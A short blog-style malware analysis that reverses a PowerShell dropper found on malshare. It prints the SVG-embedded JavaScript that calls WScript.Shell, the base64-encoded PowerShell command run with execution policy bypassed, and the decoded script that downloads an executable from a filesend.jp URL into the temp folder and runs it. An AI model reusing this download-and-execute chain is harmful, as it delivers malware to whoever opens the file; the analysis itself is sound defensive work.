Malware Safari: Reversing A Powershell Dropper

Malware Safari: Reversing A Powershell Dropper

Recently I was reading a twitter thread by @_mbanana about malware analysis and saw the website malshare mentioned. To make a long story short I signed up for an api key and the first sample I saw had a powershell label. I decided to look into it and found a powershell dropper.

Overview

The malware started from an online file that created an activeXobject that spawned a powershell dropper. The dropper than downloaded an executable from the url https://cdn.filesend.jp/private/kO85h9cY6XXElZXVg-PK9KJX3TXoOnxMkTnVjca9hrJOUuGkw8PMomNdQ2OEcc2E/Secures.exe. The link has been removed because it was known to host malicious content.

The initial part of the stager

The first part of the stager is an svg file with javascript embedded inside of it. The embedded javascript is a fairly common one-liner used to get code execution outside of a browser.

var r = new ActiveXObject("WScript.Shell").Run
("PowERsHELl.ExE -ExecutionPolicy bypass /e 
IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBmAGkAbABlAHMAZQBuAGQALgBqAHAALwBwAHIAaQB2AGEAdABlAC8AawBPADgANQBoADkAYwBZADYAWABYAEUAbABaAFgAVgBnAC0AUABLADkASwBKAFgAMwBUAFgAbwBPAG4AeABNAGsAVABuAFYAagBjAGEAOQBoAHIASgBPAFUAdQBHAGsAdwA4AFAATQBvAG0ATgBkAFEAMgBPAEUAYwBjADIARQAvAFMAZQBjAHUAcgBlAHMALgBlAHgAZQAdICAALAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABUAE4AVwB3AGYALgBlAHgAZQAdICAAKQAgADsAIABzAHQAQQBSAHQAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAVABOAFcAdwBmAC4AZQB4AGUAHSA=");

The javascript creates an activeXobject that is used to run a base64 encoded powershell command. Which brings us to the second stage of our dropper.

The second stage of the dropper

After looking at the encoded command I decided to copy the base64 blob into its own file, which I called dropper.b64. To decode the encoded command I ran the following command cat dropper.b64 | base64 -d. Which output the following powershell

(NEw-objEct  `N`e`T`.`W`e`B`C`l`i`e`N`T )
.DownLoAdfIlE("https://cdn.filesend.jp/private/kO85h9cY6XXElZXVg-PK9KJX3TXoOnxMkTnVjca9hrJOUuGkw8PMomNdQ2OEcc2E/Secures.exe", "$ENv:temp\TNWwf.exe"); 
stARt  $ENv:temp\TNWwf.exe

The powershell is fairly straight forward; A dotNet WebClient is created and is used to download an executable into a temp file. That file is then executed by the powershell dropper. And this is where the journey ends because the cloud provider removed the malicious payload from their website. :)

Ending notes

The dropper is initially staged by a bit of javascript embedded inside of an svg, which in turn spawns a powershell script that downloads the, now removed, payload.